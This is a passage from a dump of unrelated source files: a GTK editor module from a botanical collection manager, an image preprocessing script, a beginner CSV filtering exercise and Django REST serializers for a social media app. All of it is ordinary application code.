If problem_id is\n None and problem_widgets is None then method won't do anything.\n\n :param problem_id: the problem to remove, if None then remove\n any problem from the problem_widget(s)\n\n :param problem_widgets: a Gtk.Widget instance to remove the problem\n from, if None then remove all occurrences of problem_id regardless\n of the widget\n \"\"\"\n logger.debug('remove_problem(%s, %s, %s)' %\n (self, problem_id, widget))\n if problem_id is None and widget is None:\n logger.warning('invoke remove_problem with None, None')\n # if no problem id and not problem widgets then don't do anything\n return\n\n if not isinstance(widget, (Gtk.Widget, type(None))):\n try:\n widget = getattr(self.view.widgets, widget)\n except:\n logger.info(\"can't get widget %s\" % widget)\n\n tmp = self.problems.copy()\n for p, w in tmp:\n if (w == widget and p == problem_id) or \\\n (widget is None and p == problem_id) or \\\n (w == widget and problem_id is None):\n if w and not prefs.testing:\n w.modify_bg(Gtk.StateType.NORMAL, None)\n w.modify_base(Gtk.StateType.NORMAL, None)\n w.queue_draw()\n self.problems.remove((p, w))\n logger.debug('problems now: %s' % self.problems)\n\n def add_problem(self, problem_id, problem_widgets=None):\n \"\"\"\n Add problem_id to self.problems and change the background of widget(s)\n in problem_widgets.\n\n :param problem_id: A unique id for the problem.\n\n :param problem_widgets: either a widget or list of widgets\n whose background color should change to indicate a problem\n (default=None)\n \"\"\"\n ## map case list of widget to list of cases single widget.\n logger.debug('add_problem(%s, %s, %s)' %\n (self, problem_id, problem_widgets))\n if isinstance(problem_widgets, (tuple, list)):\n list(map(lambda w: self.add_problem(problem_id, w), problem_widgets))\n return\n\n ## here single widget.\n widget = problem_widgets\n if not isinstance(widget, Gtk.Widget):\n try:\n widget = getattr(self.view.widgets, widget)\n except:\n logger.info(\"can't get widget %s\" % widget)\n self.problems.add((problem_id, widget))\n if isinstance(widget, str):\n self.view.mark_problem(widget)\n elif widget is not None:\n widget.modify_bg(Gtk.StateType.NORMAL, self.problem_color)\n widget.modify_base(Gtk.StateType.NORMAL, self.problem_color)\n widget.queue_draw()\n logger.debug('problems now: %s' % self.problems)\n\n def init_enum_combo(self, widget_name, field):\n \"\"\"\n Initialize a Gtk.ComboBox widget with name widget_name from\n enum values in self.model.field\n\n :param widget_name:\n\n :param field:\n \"\"\"\n combo = self.view.widgets[widget_name]\n mapper = object_mapper(self.model)\n values = mapper.c[field].type.values\n if None in values:\n logger.debug(\"None value found in column %s, that is not in the Enum\" % field)\n values.remove(None)\n values.insert(0, '')\n values = sorted(values)\n utils.setup_text_combobox(combo, values)\n\n def set_model_attr(self, attr, value, validator=None):\n \"\"\"\n It is best to use this method to set values on the model\n rather than setting them directly. 
Derived classes can\n override this method to take action when the model changes.\n\n :param attr: the attribute on self.model to set\n :param value: the value the attribute will be set to\n :param validator: validates the value before setting it\n \"\"\"\n logger.debug('editor.set_model_attr(%s, %s)' % (attr, value))\n if validator:\n try:\n logger.debug(\"validating %s(%s) for %s using %s\" % (type(value).__name__, value, attr, validator.wrapped))\n value = validator.to_python(value)\n self.remove_problem('BAD_VALUE_%s' % attr)\n except ValidatorError as e:\n logger.debug(\"GenericEditorPresenter.set_model_attr %s\" % e)\n self.add_problem('BAD_VALUE_%s' % attr)\n else:\n logger.debug(\"validated %s(%s) for %s\" % (type(value).__name__, value, attr))\n setattr(self.model, attr, value)\n else:\n setattr(self.model, attr, value)\n\n def assign_simple_handler(self, widget_name, model_attr, validator=None):\n '''\n Assign handlers to widgets to change fields in the model.\n\n :param widget_name:\n\n :param model_attr:\n\n :param validator:\n\n Note: Where widget is a Gtk.ComboBox or Gtk.ComboBoxEntry then\n the value is assumed to be stored in model[row][0]\n '''\n widget = self.view.widgets[widget_name]\n check(widget is not None, _('no widget with name %s') % widget_name)\n\n class ProblemValidator(Validator):\n\n def __init__(self, presenter, wrapped):\n self.presenter = presenter\n self.wrapped = wrapped\n\n def to_python(self, value):\n try:\n value = self.wrapped.to_python(value)\n self.presenter.remove_problem('BAD_VALUE_%s'\n % model_attr, widget)\n except Exception as e:\n logger.debug(\"GenericEditorPresenter.ProblemValidator\"\n \".to_python %s\" % e)\n self.presenter.add_problem('BAD_VALUE_%s'\n % model_attr, widget)\n raise\n return value\n\n if validator:\n validator = ProblemValidator(presenter=self, wrapped=validator)\n\n if isinstance(widget, Gtk.Entry):\n def on_changed(entry):\n self.set_model_attr(model_attr, entry.props.text, validator)\n self.view.connect(widget, 'changed', on_changed)\n elif isinstance(widget, Gtk.TextView):\n def on_changed(textbuff):\n self.set_model_attr(model_attr, textbuff.props.text, validator)\n buff = widget.get_buffer()\n self.view.connect(buff, 'changed', on_changed)\n elif isinstance(widget, Gtk.ComboBox):\n # this also handles Gtk.ComboBoxEntry since it extends\n # Gtk.ComboBox\n def combo_changed(combo, data=None):\n if not combo.get_active_iter():\n # get here if there is no model on the ComboBoxEntry\n return\n model = combo.get_model()\n if model is None or combo.get_active_iter() is None:\n return\n value = model[combo.get_active_iter()][0]\n value = combo.get_model()[combo.get_active_iter()][0]\n if isinstance(widget, Gtk.ComboBox) and isinstance(widget.get_child(), Gtk.Entry):\n widget.get_child().set_text(utils.utf8(value) or '')\n self.set_model_attr(model_attr, value, validator)\n\n def entry_changed(entry, data=None):\n self.set_model_attr(model_attr, entry.props.text, validator)\n\n self.view.connect(widget, 'changed', combo_changed)\n if isinstance(widget, Gtk.ComboBox) and isinstance(widget.get_child(), Gtk.Entry):\n self.view.connect(widget.get_child(), 'changed', entry_changed)\n elif isinstance(widget, (Gtk.ToggleButton, Gtk.CheckButton,\n Gtk.RadioButton)):\n def toggled(button, data=None):\n active = button.get_active()\n logger.debug('toggled %s: %s' % (widget_name, active))\n button.set_inconsistent(False)\n self.set_model_attr(model_attr, active, validator)\n self.view.connect(widget, 'toggled', toggled)\n else:\n 
raise ValueError('assign_simple_handler() -- '\n 'widget type not supported: %s' % type(widget))\n\n def assign_completions_handler(self, widget, get_completions,\n on_select=lambda v: v):\n \"\"\"Dynamically handle completions on a Gtk.Entry.\n\n :param widget: a Gtk.Entry instance or widget name\n\n :param get_completions: the callable to invoke when a list of\n completions is requested, accepts the string typed, returns an\n iterable of completions\n\n :param on_select: callback for when a value is selected from\n the list of completions\n\n \"\"\"\n\n logger.debug('assign_completions_handler %s' % widget)\n if isinstance(widget, str):\n widget = self.view.widgets[widget]\n PROBLEM = hash(Gtk.Buildable.get_name(widget))\n\n def add_completions(text):\n if get_completions is None:\n logger.debug(\"completion model has static list\")\n # get_completions is None usually means that the\n # completions model already has a static list of\n # completions\n return\n # get the completions using [0:key_length] as the start of\n # the string\n\n def idle_callback(values):\n completion = widget.get_completion()\n utils.clear_model(completion)\n completion_model = Gtk.ListStore(object)\n for v in values:\n completion_model.append([v])\n completion.set_model(completion_model)\n\n key_length = widget.get_completion().props.minimum_key_length\n values = get_completions(text[:key_length])\n logger.debug('completions to add: %s' % str([i for i in values]))\n GObject.idle_add(idle_callback, values)\n\n def on_changed(entry, *args):\n logger.debug('assign_completions_handler::on_changed %s %s'\n % (entry, args))\n text = entry.get_text()\n\n key_length = widget.get_completion().props.minimum_key_length\n if len(text) > key_length:\n logger.debug('recomputing completions matching %s' % text)\n add_completions(text)\n\n def idle_callback(text):\n logger.debug('on_changed - part two')\n comp = entry.get_completion()\n comp_model = comp.get_model()\n found = []\n if comp_model:\n comp_model.foreach(lambda m, p, i, ud: logger.debug(\"item(%s) of comp_model: %s\" % (p, m[p][0])), None)\n # search the tree model to see if the text in the\n # entry matches one of the completions, if so then\n # emit the match-selected signal, this allows us to\n # type a match in the entry without having to select\n # it from the popup\n def _cmp(row, data):\n return utils.utf8(row[0])[:len(text)].lower() == data.lower()\n found = utils.search_tree_model(comp_model, text, _cmp)\n logger.debug(\"matches found in ListStore: %s\" % str(found))\n if not found:\n logger.debug('nothing found, nothing to select from')\n elif len(found) == 1:\n logger.debug('one match, decide whether to select it - %s' % found[0])\n v = comp.get_model()[found[0]][0]\n # only auto select if the full string has been entered\n if text.lower() == utils.utf8(v).lower():\n comp.emit('match-selected', comp.get_model(), found[0])\n else:\n found = None\n else:\n logger.debug('multiple matches, we cannot select any - %s' % str(found))\n\n if text != '' and not found and PROBLEM not in self.problems:\n self.add_problem(PROBLEM, widget)\n on_select(None)\n\n # if entry is empty select nothing and remove all problem\n if text == '':\n on_select(None)\n self.remove_problem(PROBLEM, widget)\n elif not comp_model:\n ## completion model is not in place when object is forced\n ## programmatically.\n on_select(text) # `on_select` will know how to convert the\n # text into a properly typed value.\n self.remove_problem(PROBLEM, widget)\n logger.debug('on_changed - part two - 
returning')\n\n GObject.idle_add(idle_callback, text)\n logger.debug('on_changed - part one - returning')\n return True\n\n def on_match_select(completion, compl_model, treeiter):\n value = compl_model[treeiter][0]\n # temporarily block the changed ID so that this function\n # doesn't get called twice\n widget.handler_block(_changed_sid)\n widget.props.text = utils.utf8(value)\n widget.handler_unblock(_changed_sid)\n self.remove_problem(PROBLEM, widget)\n on_select(value)\n return True # return True or on_changed() will be called with ''\n\n completion = widget.get_completion()\n check(completion is not None, 'the Gtk.Entry %s doesn\\'t have a '\n 'completion attached to it' % Gtk.Buildable.get_name(widget))\n\n _changed_sid = self.view.connect(widget, 'changed', on_changed)\n self.view.connect(completion, 'match-selected', on_match_select)\n\n def start(self):\n \"\"\"run the dialog associated to the view\n\n \"\"\"\n result = self.view.get_window().run()\n if (self.is_committing_presenter\n and result in self.committing_results\n and self._dirty):\n self.commit_changes()\n self.cleanup()\n return result\n\n def cleanup(self):\n \"\"\"\n Revert any changes the presenter might have done to the\n widgets so that next time the same widgets are open everything\n will be normal.\n\n By default it only calls self.view.cleanup()\n \"\"\"\n self.clear_problems()\n if isinstance(self.view, GenericEditorView):\n self.view.cleanup()\n\n\nclass ChildPresenter(GenericEditorPresenter):\n \"\"\"\n This Presenter acts as a proxy to another presenter that shares\n the same view. This avoids circular references by not having a\n presenter within a presenter that both hold references to the\n view.\n\n This Presenter keeps a weakref to the parent presenter and\n provides a pass through to the parent presenter for calling\n methods that reference the view.\n \"\"\"\n\n def __init__(self, model, view):\n super().__init__(model, view)\n #self._view_ref = weakref.ref(view)\n\n def _get_view(self):\n return self._view_ref()\n\n def _set_view(self, view):\n if isinstance(view, GenericEditorView):\n self._view_ref = weakref.ref(view)\n else:\n raise ValueError('view must be an instance of GenericEditorView')\n\n view = property(_get_view, _set_view)\n\n\nclass GenericModelViewPresenterEditor(object):\n '''\n GenericModelViewPresenterEditor assume that model is an instance\n of object mapped to a SQLAlchemy table\n\n The editor creates its own session and merges the model into\n it. 
If the model is already in another session that original\n session will not be effected.\n\n When creating a subclass of this editor then you should explicitly\n close the session when you are finished with it.\n\n :param model: an instance of an object mapped to a SQLAlchemy\n Table, the model will be copied and merged into self.session so\n that the original model will not be changed\n\n :param parent: the parent windows for the view or None\n '''\n ok_responses = ()\n\n def __init__(self, model, parent=None):\n self.session = db.Session()\n self.model = self.session.merge(model)\n\n def commit_changes(self):\n '''\n Commit the changes to self.session()\n '''\n objs = list(self.session)\n try:\n self.session.commit()\n try:\n bauble.gui.get_view().update()\n except Exception as e:\n pass\n except Exception as e:\n logger.warning(\"can't commit changes: (%s) %s\" % (type(e), e))\n self.session.rollback()\n self.session.add_all(objs)\n raise\n return True\n\n def __del__(self):\n if hasattr(self, 'session'):\n # in case one of the check()'s fail in __init__\n self.session.commit()\n self.session.close()\n\n\nclass NoteBox(Gtk.HBox):\n glade_ui = 'notes.glade'\n\n def set_content(self, text):\n buff = Gtk.TextBuffer()\n self.widgets.note_textview.set_buffer(buff)\n utils.set_widget_value(self.widgets.note_textview,\n text or '')\n if not text:\n self.presenter.add_problem(self.presenter.PROBLEM_EMPTY, self.widgets.note_textview)\n buff.connect('changed', self.on_note_buffer_changed, self.widgets.note_textview)\n\n def __init__(self, presenter, model=None):\n super().__init__()\n\n # open the glade file and extract the markup that the\n # expander will use\n filename = os.path.join(paths.lib_dir(), self.glade_ui)\n xml = etree.parse(filename)\n el = xml.find(\"//object[@id='notes_box']\")\n builder = Gtk.Builder()\n s = '%s' % etree.tostring(el)\n if sys.platform == 'win32':\n # NOTE: PyGTK for Win32 is broken so we have to include\n # this little hack\n #\n # TODO: is this only a specific set of version of\n # PyGTK/GTK...it was only tested with PyGTK 2.12\n builder.add_from_string(s, -1)\n else:\n builder.add_from_string(s)\n self.widgets = utils.BuilderWidgets(builder)\n\n notes_box = self.widgets.notes_box\n self.widgets.remove_parent(notes_box)\n self.pack_start(notes_box, True, True, 0)\n\n self.session = object_session(presenter.model)\n self.presenter = presenter\n if model:\n self.model = model\n else:\n self.model = presenter.note_cls()\n\n self.widgets.notes_expander.props.use_markup = True\n self.widgets.notes_expander.props.label = ''\n self.widgets.notes_expander.props.label_widget.\\\n ellipsize = Pango.EllipsizeMode.END\n\n # set the model values on the widgets\n mapper = object_mapper(self.model)\n values = utils.get_distinct_values(mapper.c['category'],\n self.session)\n utils.setup_text_combobox(self.widgets.category_comboentry, values)\n utils.set_widget_value(self.widgets.category_comboentry,\n self.model.category or '')\n utils.setup_date_button(None, self.widgets.date_entry,\n self.widgets.date_button)\n date_str = utils.today_str()\n if self.model.date:\n format = prefs.prefs[prefs.date_format_pref]\n date_str = self.model.date.strftime(format)\n utils.set_widget_value(self.widgets.date_entry, date_str)\n utils.set_widget_value(self.widgets.user_entry,\n self.model.user or '')\n self.set_content(self.model.note)\n\n # connect the signal handlers\n self.widgets.date_entry.connect(\n 'changed', self.on_date_entry_changed)\n self.widgets.user_entry.connect(\n 'changed', 
self.on_user_entry_changed)\n # connect category comboentry widget and child entry\n self.widgets.category_comboentry.connect(\n 'changed', self.on_category_combo_changed)\n self.widgets.category_comboentry.get_child().connect(\n 'changed', self.on_category_entry_changed)\n self.widgets.notes_remove_button.connect(\n 'clicked', self.on_notes_remove_button)\n\n self.update_label()\n self.show_all()\n\n def set_expanded(self, expand):\n self.widgets.notes_expander.props.expanded = expand\n\n def on_notes_remove_button(self, button, *args):\n \"\"\"\n \"\"\"\n if self.model in self.presenter.notes:\n self.presenter.notes.remove(self.model)\n self.widgets.remove_parent(self.widgets.notes_box)\n self.presenter._dirty = True\n self.presenter.parent_ref().refresh_sensitivity()\n\n def on_date_entry_changed(self, entry, *args):\n PROBLEM = 'BAD_DATE'\n text = entry.props.text\n try:\n text = DateValidator().to_python(text)\n except Exception as e:\n logger.debug(e)\n self.presenter.add_problem(PROBLEM, entry)\n else:\n self.presenter.remove_problem(PROBLEM, entry)\n self.set_model_attr('date', text)\n\n def on_user_entry_changed(self, entry, *args):\n value = utils.utf8(entry.props.text)\n if not value: # if value == ''\n value = None\n self.set_model_attr('user', value)\n\n def on_category_combo_changed(self, combo, *args):\n \"\"\"\n Sets the text on the entry. The model value is set in the\n entry \"changed\" handler.\n \"\"\"\n text = ''\n treeiter = combo.get_active_iter()\n if treeiter:\n text = utils.utf8(combo.get_model()[treeiter][0])\n else:\n return\n self.widgets.category_comboentry.get_child().props.text = \\\n utils.utf8(text)\n\n def on_category_entry_changed(self, entry, *args):\n \"\"\"\n \"\"\"\n value = utils.utf8(entry.props.text)\n if not value: # if value == ''\n value = None\n self.set_model_attr('category', value)\n\n def on_note_buffer_changed(self, buff, widget, *args):\n value = utils.utf8(buff.props.text)\n if not value: # if value == ''\n value = None\n self.presenter.add_problem(self.presenter.PROBLEM_EMPTY, widget)\n else:\n self.presenter.remove_problem(self.presenter.PROBLEM_EMPTY, widget)\n self.set_model_attr('note', value)\n\n def update_label(self):\n label = []\n date_str = None\n if self.model.date and isinstance(self.model.date, datetime.date):\n format = prefs.prefs[prefs.date_format_pref]\n date_str = utils.xml_safe(\n self.model.date.strftime(format))\n elif self.model.date:\n date_str = utils.xml_safe(self.model.date)\n else:\n date_str = self.widgets.date_entry.props.text\n\n if self.model.user and date_str: # and self.model.date:\n label.append(_('%(user)s on %(date)s') %\n dict(user=utils.xml_safe(self.model.user),\n date=date_str))\n elif date_str:\n label.append('%s' % date_str)\n elif self.model.user:\n label.append('%s' % utils.xml_safe(self.model.user))\n\n if self.model.category:\n label.append('(%s)' % utils.xml_safe(self.model.category))\n\n if self.model.note:\n note_str = ' : %s' % utils.xml_safe(self.model.note).\\\n replace('\\n', ' ')\n max_length = 25\n # label.props.ellipsize doesn't work properly on a\n # label in an expander we just do it ourselves here\n if len(self.model.note) > max_length:\n label.append('%s …' % note_str[0:max_length-1])\n else:\n label.append(note_str)\n\n self.widgets.notes_expander.set_label(' '.join(label))\n\n def set_model_attr(self, attr, value):\n setattr(self.model, attr, value)\n self.presenter._dirty = True\n if attr != 'date' and not self.model.date:\n # this is a little voodoo to set the date on the 
model\n            # since when we create a new note box we add today's\n            # date to the entry but we don't set the model so the\n            # presenter doesn't appear dirty...we have to use a\n            # tmp variable since the changed signal won't fire if\n            # the new value is the same as the old\n            entry = self.widgets.date_entry\n            tmp = entry.props.text\n            entry.props.text = ''\n            entry.props.text = tmp\n            # if the note is new and isn't yet associated with an\n            # accession then set the accession when we start\n            # changing values, this way we can setup a dummy\n            # verification in the interface\n            self.presenter.notes.append(self.model)\n\n        self.update_label()\n\n        self.presenter.parent_ref().refresh_sensitivity()\n\n    @classmethod\n    def is_valid_note(cls, note):\n        return True\n\n\nclass PictureBox(NoteBox):\n    glade_ui = 'pictures.glade'\n    last_folder = '.'\n\n    def __init__(self, presenter, model=None):\n        super().__init__(presenter, model)\n        utils.set_widget_value(self.widgets.category_comboentry,\n                               '')\n        self.presenter._dirty = False\n\n        self.widgets.picture_button.connect(\n            \"clicked\", self.on_activate_browse_button)\n\n    def set_content(self, basename):\n        for w in list(self.widgets.picture_button.get_children()):\n            w.destroy()\n        if basename is not None:\n            im = Gtk.Image()\n            try:\n                thumbname = os.path.join(\n                    prefs.prefs[prefs.picture_root_pref], 'thumbs', basename)\n                filename = os.path.join(\n                    prefs.prefs[prefs.picture_root_pref], basename)\n                if os.path.isfile(thumbname):\n                    pixbuf = GdkPixbuf.Pixbuf.new_from_file(thumbname)\n                else:\n                    fullbuf = GdkPixbuf.Pixbuf.new_from_file(filename)\n                    fullbuf = fullbuf.apply_embedded_orientation()\n                    scale_x = fullbuf.get_width() / 400.0\n                    scale_y = fullbuf.get_height() / 400.0\n                    scale = max(scale_x, scale_y, 1)\n                    x = int(fullbuf.get_width() / scale)\n                    y = int(fullbuf.get_height() / scale)\n                    pixbuf = fullbuf.scale_simple(\n                        x, y, GdkPixbuf.InterpType.BILINEAR)\n                im.set_from_pixbuf(pixbuf)\n            except GLib.GError as e:\n                logger.debug(\"picture %s caused GLib.GError %s\" %\n                             (basename, e))\n                label = _('picture file %s not found.') % basename\n                im = Gtk.Label()\n                im.set_text(label)\n            except Exception as e:\n                logger.warning(\"can't show picture: (%s) %s\" % (type(e), e))\n                im = Gtk.Label()\n                im.set_text(str(e))\n        else:\n            # make button hold some text\n            im = Gtk.Label()\n            im.set_text(_('Choose a file…'))\n        im.show()\n        self.widgets.picture_button.add(im)\n        self.widgets.picture_button.show()\n\n    def on_activate_browse_button(self, widget, data=None):\n        fileChooserDialog = Gtk.FileChooserDialog(\n            _(\"Choose a file…\"), None,\n            buttons=(Gtk.STOCK_OK, Gtk.ResponseType.ACCEPT,\n                     Gtk.STOCK_CANCEL, Gtk.ResponseType.CANCEL))\n        try:\n            logger.debug('about to set current folder - %s' % self.last_folder)\n            fileChooserDialog.set_current_folder(self.last_folder)\n            fileChooserDialog.run()\n            filename = fileChooserDialog.get_filename()\n            if filename:\n                ## remember chosen location for next time\n                PictureBox.last_folder, basename = os.path.split(str(filename))\n                logger.debug('new current folder is: %s' % self.last_folder)\n                ## copy file to picture_root_dir (if not yet there),\n                ## also receiving thumbnail base64\n                thumb = utils.copy_picture_with_thumbnail(self.last_folder, basename)\n                ## make sure the category is \n                self.set_model_attr('category', '')\n                ## append thumbnail base64 to content string\n                basename = basename + \"|data:image/jpeg;base64,\" + thumb\n                ## store basename in note field and fire callbacks.\n                self.set_model_attr('note', basename)\n                self.set_content(basename)\n        except Exception as e:\n            
logger.warning(\"unhandled exception in editor.py: \"\n \"(%s)%s\" % (type(e), e))\n fileChooserDialog.destroy()\n\n def on_category_entry_changed(self, entry, *args):\n pass\n\n @classmethod\n def is_valid_note(cls, note):\n return note.category == ''\n\n\n# TODO: create a separate class for browsing notes in a treeview\n# structure\n\n# TODO: add an \"editable\" property to the NotesPresenter and if it is\n# True then show the add/remove buttons\n\nclass NotesPresenter(GenericEditorPresenter):\n \"\"\"\n The NotesPresenter provides a generic presenter for editor notes\n on an item in the database. This presenter requires that the\n notes property provide a specific interface.\n\n :param presenter: the parent presenter of this presenter\n :param notes_property: the string name of the notes property of\n the presenter.model\n :param parent_container: the Gtk.Container to add the notes editor box to\n \"\"\"\n\n ContentBox = NoteBox\n\n def __init__(self, presenter, notes_property, parent_container):\n super().__init__(presenter.model, None)\n\n # The glade file named in ContentBox is structured with two top\n # GtkWindow next to each other. Here, by not doing any lookup, we\n # get the first one, from which we extract the 'notes_editor_box'\n # child. This is expected to contain a 'notes_expander_box' vertical\n # box, which will host all expanders. In the content box we\n # extract, from the same file, the widget named 'notes_box'.\n filename = os.path.join(paths.lib_dir(), self.ContentBox.glade_ui)\n self.widgets = utils.BuilderWidgets(filename)\n\n self.parent_ref = weakref.ref(presenter)\n self.note_cls = object_mapper(presenter.model).\\\n get_property(notes_property).mapper.class_\n self.notes = getattr(presenter.model, notes_property)\n self.parent_container = parent_container\n editor_box = self.widgets.notes_editor_box # Gtk.VBox()\n self.widgets.remove_parent(editor_box)\n parent_container.add(editor_box)\n\n # the `expander`s are added to self.box\n self.box = self.widgets.notes_expander_box\n\n valid_notes_count = 0\n for note in self.notes:\n if self.ContentBox.is_valid_note(note):\n box = self.add_note(note)\n box.set_expanded(False)\n valid_notes_count += 1\n\n logger.debug('notes: %s' % self.notes)\n logger.debug('children: %s' % self.box.get_children())\n\n self.widgets.notes_add_button.connect(\n 'clicked', self.on_add_button_clicked)\n self.box.show_all()\n\n def on_add_button_clicked(self, *args):\n box = self.add_note()\n box.set_expanded(True)\n\n def add_note(self, note=None):\n \"\"\"\n Add a new note to the model.\n \"\"\"\n expander = self.ContentBox(self, note)\n self.box.pack_start(expander, False, False, 0)\n self.box.reorder_child(expander, 0)\n expander.show_all()\n return expander\n\n\nclass PicturesPresenter(NotesPresenter):\n \"\"\"pictures are associated to notes of category .\n\n you add a picture and you see a picture but the database will just hold\n the name of the corresponding file.\n\n as for other presenters, you can expand/collapse each inserted\n picture, you add or remove pictures, you see them on screen.\n\n this class works just the same as the NotesPresenter, with the\n note_textview replaced by a Button containing an Image.\n \"\"\"\n\n ContentBox = PictureBox\n\n def __init__(self, presenter, notes_property, parent_container):\n super().__init__(\n presenter, notes_property, parent_container)\n\n notes = self.box.get_children()\n if notes:\n notes[0].set_expanded(False) # expand 
none\n","repo_name":"Ghini/ghini.desktop","sub_path":"bauble/editor.py","file_name":"editor.py","file_ext":"py","file_size_in_byte":83614,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"37"} +{"seq_id":"23726346889","text":"from PIL import Image\nfrom libtiff import TIFF\nimport numpy as np\nimport glob\nimport sys\nimport cv2\nimport pandas as pd\nimport pickle\nimport matplotlib.pyplot as plt\nimport math\nfrom scipy.stats import mode\n\ndef preprocess_file(filename):\n    print(filename)\n    #processed_data = pd.read_csv(filename).groupby('plate').apply(aggr)\n    try:\n        img = Image.open(filename)\n        #img = cv2.imread(filename)\n        #img = TIFF.open(filename)\n        #b,g,r = Image.Image.split(img)\n        #imarray = [np.array(r),np.array(g),np.array(b)]\n        imarray = np.array(img)\n        #imarray = img.read_image()\n        return imarray\n    except Exception:\n        print(\"Bad file!\")\n        return 1\n\nlabels_file = pd.read_csv(\"_labels.csv\")\n\npath = \"test_data\"#\"training_data/Final_project\"#\"test_images\"\nfilenames = glob.glob(path + \"/*.tif\")\nbad_files_count = 0\ngood_files_count = 0\nfor filename in filenames:\n    id_name = filename[:-4][10:]\n    #id_name = filename[:-4][12:]\n    print(id_name)\n    new_name = \"preprocessed_test_data/prep_data_\" + id_name + \".pickle\"\n    print(new_name)\n    #print(filename[:-4][12:])\n    data = preprocess_file(filename)\n\n    if type(data) is int:\n        bad_files_count = bad_files_count + 1\n    else:\n        good_files_count = good_files_count + 1\n        #print(labels_file.loc[labels_file[\"id\"]==id_name])\n        label = labels_file.loc[labels_file[\"id\"]==id_name]['label'].item()\n        preprocessed_data = [data, label]\n        print(data.shape)\n\n        with open(new_name, 'wb') as f:\n            pickle.dump(preprocessed_data, f)\nprint(bad_files_count)\nprint(good_files_count)","repo_name":"aschuliger/classifying_and_localizing_metastatic_tumor_cells_with_deep_learning","sub_path":"image_processing.py","file_name":"image_processing.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"948392598","text":"# Data analysis practice\n# Read the books.csv file and complete the get_titles_of_long_books() function\n# so that it returns a list of the titles of books longer than 250 pages.\n\nimport csv\n\ndef get_titles_of_long_books(books):\n    with open(books) as file:\n        reader = csv.reader(file, delimiter=',')\n\n        is_long = lambda row: int(row[3]) > 250\n        get_title = lambda row: row[0]\n\n        long_books = list(filter(is_long, reader))\n\n        long_books_titles = map(get_title, long_books)\n\n        return list(long_books_titles)\n\n\n\nbooks = './data/18_books.csv'\ntitles = get_titles_of_long_books(books)\nfor title in titles:\n    print(title)\n\n# Applying a function to a list\n# filter() is a built-in Python function that picks out only the elements of a given data structure that satisfy a condition.\n\n\n","repo_name":"srang03/dataAnalysis_low","sub_path":"data_practice/23_filter_func.py","file_name":"23_filter_func.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
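The record above leans on `filter()`/`map()` with small lambdas; the same selection reads more idiomatically as a list comprehension. A self-contained sketch, with sample rows invented for illustration in the books.csv column order (title, author, year, pages):

```python
# Invented sample rows; only columns 0 (title) and 3 (pages) matter here.
rows = [
    ["Dune", "Frank Herbert", "1965", "412"],
    ["The Pearl", "John Steinbeck", "1947", "96"],
]

# filter/map spelling, as used in the record above
titles = list(map(lambda row: row[0], filter(lambda row: int(row[3]) > 250, rows)))

# equivalent list-comprehension spelling
titles_lc = [row[0] for row in rows if int(row[3]) > 250]

assert titles == titles_lc == ["Dune"]
```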
 +{"seq_id":"15081908149","text":"from user.models import Profile\nfrom .models import poster, Comment, Image, Like\nfrom .models import Story, StoryViewer\nfrom rest_framework import serializers\n# tip: using an image field in serializers\n# field_name = serializers.ImageField(use_url=True)\n\nclass commentSeralizer(serializers.ModelSerializer):\n    class Meta:\n        managed=True\n        model = Comment\n        db_table = 'Comments'\n        fields = ['commentId','posterId','writer','writerImage','uploadTime','body']\n\n    # override create directly so we can reach the related model\n    def create(self,validated_data):\n        posterId = validated_data.get(\"posterId\")\n        writer = validated_data.get(\"writer\")\n        body = validated_data.get(\"body\")\n        writerImage = writer.userImage\n\n        viewer_create = Comment.objects.create(posterId =posterId\n                                            ,writer=writer\n                                            ,writerImage=writerImage\n                                            ,body =body)\n        return viewer_create\n\nclass imageSeralizer(serializers.ModelSerializer):\n    class Meta:\n        managed=True\n        model = Image\n        db_table = 'Images'\n        fields = \"__all__\"\n\nclass likeSeralizer(serializers.ModelSerializer):\n    # foreign key: liker points to a Profile\n    # likerImage = serializers.ImageField(source='liker.userImage')\n\n    class Meta:\n        managed=True\n        model = Like\n        db_table = 'Likes'\n        fields = ['likeId','posterId','liker','likerImage','uploadTime']\n\n    # override create directly so we can reach the related model\n    def create(self,validated_data):\n        posterId = validated_data.get(\"posterId\")\n        liker = validated_data.get(\"liker\")\n        likerImage = liker.userImage\n\n        viewer_create = Like.objects.create(posterId =posterId\n                                            ,liker=liker\n                                            ,likerImage=likerImage)\n        return viewer_create\n\n\nclass posterSeralizer(serializers.ModelSerializer):\n    commentPost = commentSeralizer(many = True,read_only=True)\n    imagePost = imageSeralizer(many = True,read_only=True)\n    likePost = likeSeralizer(many=True,read_only=True)\n    # tip: looks up the matching username\n    # def validated_username(self, data):\n    #     return data\n    # ##################\n\n    # fields for the counters\n    commentCount = serializers.ReadOnlyField( source='commentPost.count')\n    likeCount = serializers.ReadOnlyField( source='likePost.count')\n    imageCount = serializers.ReadOnlyField( source='imagePost.count')\n\n    class Meta:\n        managed=True\n        model = poster\n        db_table = 'posters'\n        fields = ['posterId','username','body',\n                'commentPost','imagePost','likePost','uploadTime',\n                'commentCount','likeCount','imageCount']\n\n    # how to accept several image files in a single request\n    def create(self, validated_data):\n        images_data = self.context['request'].FILES\n\n        poster_create = poster.objects.create(**validated_data)\n        for image_data in images_data.getlist('Oneimage'):\n            Image.objects.create(posterId=poster_create,Oneimage=image_data)\n        return poster_create\n\nclass storyViewerSeralizer(serializers.ModelSerializer):\n    class Meta:\n        managed=True\n        model = StoryViewer\n        db_table = 'StoryViewers'\n        fields = ['storyId','viewer','viewerImage']\n\n    # override create directly so we can reach the related model\n    def create(self,validated_data):\n        storyId = validated_data.get(\"storyId\")\n        viewer = validated_data.get(\"viewer\")\n        viewerImage = viewer.userImage\n\n        viewer_create = StoryViewer.objects.create(storyId =storyId\n                                            ,viewerImage=viewerImage)\n        return viewer_create\n\n\nclass storySeralizer(serializers.ModelSerializer):\n    storyViewerPost = storyViewerSeralizer(many=True,read_only=True)\n    class Meta:\n        managed=True\n        model = Story\n        db_table = 'Storys'\n        fields = ['storyId','username','storyImage','uploadTime','storyViewerPost']\n","repo_name":"jinuemong/DRF-Server-Jinustagram","sub_path":"jinustagram/posting/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25672282197","text":"# coding=utf-8\n\n\"\"\"Field filter 